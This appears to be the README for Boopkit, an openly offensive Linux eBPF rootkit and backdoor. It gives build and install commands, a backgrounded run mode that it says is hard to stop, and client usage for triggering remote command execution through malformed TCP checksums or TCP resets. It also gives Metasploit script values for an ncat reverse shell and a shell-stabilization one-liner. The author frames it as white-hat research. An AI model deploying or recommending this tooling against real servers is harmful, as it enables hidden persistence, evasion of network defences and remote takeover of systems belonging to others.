Boopkit
Linux backdoor, rootkit, and eBPF bypass tools. Remote command execution over raw TCP.
- Tested on Linux kernel 5.16
- Tested on Linux kernel 5.17
- Remote code execution over TCP (SSH, Nginx, Kubernetes, etc)
- Network gateway bypass (bad checksums, TCP reset)
- Self obfuscation at runtime (eBPF process hiding)
Disclaimer
This is NOT an exploit! This requires prior privileged access on a server in order to work! I am a professional security researcher. These are white hat tools used for research purposes only. Use this responsibly. Never use this software illegally.
Server Side
Download and build boopkit.
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.0.5.tar.gz
tar -xzf v1.0.5.tar.gz
cd boopkit-1.0.5/
make
sudo make install
Run boopkit in the foreground.
# Reject all boops on localhost and 10.0.0.1
boopkit -x 127.0.0.1 -x 10.0.0.1
Run boopkit in the background without output
# Danger! This can be VERY hard to stop! Run this at your own risk!
boopkit &> /dev/null &
Boopkit is now running and will automatically try to reverse connect to any source that is booping the server!
Client Side
Download and build boopkit.
git clone https://github.com/kris-nova/boopkit.git
cd boopkit
make
sudo make install
Run boopkit-boop against the server.
# ===================
RCE="ls -la"
# ===================
LHOST="127.0.0.1"
LPORT="3535"
RHOST="127.0.0.1"
RPORT="22"
boopkit-boop \
-lhost $LHOST \
-lport $LPORT \
-rhost $RHOST \
-rport $RPORT \
-x "$RCE"
Remote Vectors
Boopkit will respond to various events on the network. Both of which can be triggered with the boopkit-boop
tool.
1. Bad Checksum
First the boopkit-boop
tool will send a malformed TCP SYN packet with an empty checksum to the server over a SOCK_RAW
socket. This will trigger boopkit
remotely regardless of what TCP services are running. In theory this would work against a server that has no TCP services listening!
2. Sending ACK-RST packet
Next the boopkit-boop
tool will complete a valid TCP handshake with a SOCK_STREAM
socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. After the initial TCP handshake is complete, boopkit-boop
will repeat the process a 2nd time.
The 2nd handshake will flip the TCP reset flag in the packet, trigger a TCP reset on the server.
Either of these tactics are enough to independently trigger boopkit. Various network hardware and runtime conditions will make either tactic more viable. Boopkit will try both, by default.
Boopscript
The boopscript
file is a Metasploit compatible script that can be used to remotely trigger the boopkit backdoor after boopkit-boop
is installed locally.
# Remote values
RHOST="127.0.0.1"
RPORT="22"
# Local values
LHOST="127.0.0.1"
LPORT="3535"
# NetCat Reverse Shell Values
NCAT="/usr/bin/ncat"
NCATLISTENPORT="3545"
Compile Time Dependencies
- 'clang'
bpftool
- 'linux-headers'
- 'llvm'
- 'libbpf'
- 'lib32-glibc'
Reverse Shell Stabilization
python -c "import pty; pty.spawn('/bin/bash')"
References
Credit to the original authors for their helpful code samples! I forked a lot of code for this project!